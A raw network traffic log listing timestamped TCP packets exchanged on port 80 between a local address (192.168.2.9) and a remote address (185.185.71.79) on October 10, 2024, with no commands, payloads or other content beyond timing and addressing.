                                                                                                                                                                                        Oct 10, 2024 13:39:44.871819019 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.871824026 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.871824026 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.871855974 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.871896982 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.871896982 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.900795937 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.900810003 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.900820971 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.900880098 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.900880098 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.900893927 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.900907993 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.900919914 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.900930882 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.900942087 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.900943995 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.900954962 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.900966883 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.900978088 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.900978088 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.901017904 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.901020050 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.901165009 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.901181936 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.901194096 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.901205063 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.901213884 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.901215076 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.901226997 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.901245117 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.901246071 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.901278019 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.927561998 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.927582026 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.927601099 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.927625895 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.927640915 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.927654982 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.927654982 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.927683115 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.927721024 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.927745104 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.927762985 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.927778006 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.927778959 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.927793980 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.927798986 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.927803040 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.927824020 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.927867889 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.927887917 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.927927971 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.927932978 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.927943945 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.927969933 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928016901 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928040028 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928050041 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928050041 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928056002 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928090096 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928090096 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928128004 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928143024 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928158998 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928173065 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928181887 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928181887 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928212881 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928222895 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928373098 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928417921 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928419113 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928436995 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928452969 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928462029 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928467035 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928478003 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928497076 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928498983 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928507090 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928529978 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928590059 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928632021 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928653955 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928669930 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928704977 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928705931 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928721905 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928736925 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928749084 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928782940 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928782940 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928889036 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.928998947 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929013014 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929027081 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929039955 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929054022 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929069042 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929069042 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929085970 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929094076 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929094076 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929102898 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929128885 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929128885 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929141998 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929156065 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929169893 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929171085 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929186106 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929187059 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929203987 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929212093 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929213047 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929251909 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929251909 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929476023 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929491043 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929506063 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929527998 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929547071 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929553032 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929563046 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929579020 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929584980 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929595947 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929617882 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929621935 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929632902 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929656029 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929668903 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929673910 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929683924 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929689884 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929714918 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.929765940 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932550907 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932574987 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932589054 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932604074 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932615042 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932615042 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932627916 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932643890 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932643890 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932660103 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932668924 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932678938 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932694912 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932709932 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932720900 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932724953 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932739973 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932754040 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932768106 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932785034 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932811022 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932894945 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932912111 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932929039 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932944059 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932950020 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932959080 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932984114 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.932986975 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933001041 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933001041 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933017969 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933027029 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933033943 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933062077 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933062077 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933098078 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933470964 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933495998 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933547020 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933559895 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933574915 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933592081 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933615923 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933625937 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933645010 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933696032 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933732033 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933747053 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933763027 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933778048 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933789968 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933795929 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933842897 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933842897 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933861017 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933875084 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933888912 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933902979 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933917046 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933917999 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933933973 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933948040 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933955908 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.933990002 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.958432913 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.958448887 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.958463907 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.958487988 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.958502054 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.958517075 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.958523035 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.958523035 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.958535910 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.958550930 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.958570957 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.958570957 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.958609104 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986279964 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986296892 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986318111 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986371994 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986371994 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986401081 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986417055 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986438036 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986448050 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986454010 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986465931 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986481905 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986496925 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986535072 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986547947 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986555099 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986555099 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986572027 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986586094 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986597061 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986597061 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986609936 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986622095 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986629009 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986629009 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986644983 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986660004 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986661911 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986661911 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986699104 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.986699104 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014437914 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014457941 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014468908 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014491081 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014538050 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014569044 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014581919 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014594078 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014605045 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014609098 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014647961 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014656067 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014667034 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014667034 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014679909 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014693022 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014704943 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014712095 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014712095 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014767885 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014767885 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014799118 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014808893 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014818907 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014830112 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014847040 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014853954 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014853954 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014859915 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014873981 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014884949 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014895916 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014899969 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014899969 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:45.014950037 CEST4978980192.168.2.9185.185.71.79
